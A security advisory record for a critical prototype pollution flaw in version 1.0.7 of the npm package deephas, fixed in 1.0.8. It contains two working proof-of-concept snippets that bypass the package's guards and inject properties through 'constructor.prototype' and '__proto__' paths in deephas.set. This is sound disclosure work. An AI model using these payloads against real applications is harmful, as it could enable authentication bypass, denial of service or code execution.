GHSA-2733-6c58-pf27

Suggest an improvement
Source
https://github.com/advisories/GHSA-2733-6c58-pf27
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/01/GHSA-2733-6c58-pf27/GHSA-2733-6c58-pf27.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-2733-6c58-pf27
Aliases
Published
2026-01-29T22:21:32Z
Modified
2026-01-29T22:41:18.928867Z
Severity
  • 9.4 (Critical) CVSS_V4 - CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H CVSS Calculator
Summary
deepHas vulnerable to Prototype Pollution via constructor.prototype
Details

Summary

A prototype pollution vulnerability exists in version 1.0.7 of the deephas npm package that allows an attacker to modify global object behavior. This issue was fixed in version 1.0.8.

Details

The vulnerability resides in the add() function and indexer() function implemented within deepHas.js. Although version 1.0.7 attempts to prevent prototype pollution by checking property ownership (e.g., using Object.hasOwnProperty) and by checking against forbidden string usage (using String.prototype.indexOf), this check can be bypassed as shown in the PoC

By doing so, an attacker can inject properties into Object.prototype through a payload such as constructor.prototype.polluted or proto.polluted resulting in prototype pollution.

This issue affects all JavaScript runtimes that rely on npm packages (including Node.js, Deno, and Bun) and is independent of the operating system.

PoC

Steps to reproduce

  1. Install version 1.0.7 of deephas using npm install
  2. Run one of the following code snippets:
    //PoC 1
    Object.prototype.hasOwnProperty = () => true;
    console.log({}.polluted);
    const dh = require('deephas');
    let obj = {};
    dh.set(obj, 'constructor.prototype.polluted', 'yes');
    console.log('{ ' + obj.polluted + ', ' + 'yes' + ' }'); // prints yes => the patch is bypassed and prototype pollution occurred
    
    OR
    //PoC 2
    String.prototype.indexOf = () => -1;
    console.log({}.polluted);
    const dh = require('deephas');
    let obj = {};
    dh.set(obj, '__proto__.polluted', 'yes');
    console.log('{ ' + obj.polluted + ', ' + 'yes' + ' }'); // prints yes => the patch is bypassed and prototype pollution occurred
    

Expected behavior

Prototype pollution should be prevented and {} should not gain new properties. This should be printed on the console:

undefined
undefined OR throw an Error

Actual behavior

Object.prototype is polluted and the property polluted becomes globally accessible. This is printed on the console:

undefined
yes

Impact

This is a prototype pollution vulnerability, which can have severe security implications depending on how deephas is used by downstream applications. Any application that processes attacker-controlled input using deephas.set may be affected. It could potentially lead to the following problems: 1. Authentication bypass 2. Denial of service 4. Remote code execution (if polluted property is passed to sinks like eval or child_process)

Database specific
{
    "cwe_ids": [
        "CWE-1321"
    ],
    "severity": "CRITICAL",
    "nvd_published_at": null,
    "github_reviewed": true,
    "github_reviewed_at": "2026-01-29T22:21:32Z"
}
References

Affected packages

npm / deephas

Package

Affected ranges

Type
SEMVER
Events
Introduced
0Unknown introduced version / All previous versions are affected
Fixed
1.0.8

Database specific

source

"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/01/GHSA-2733-6c58-pf27/GHSA-2733-6c58-pf27.json"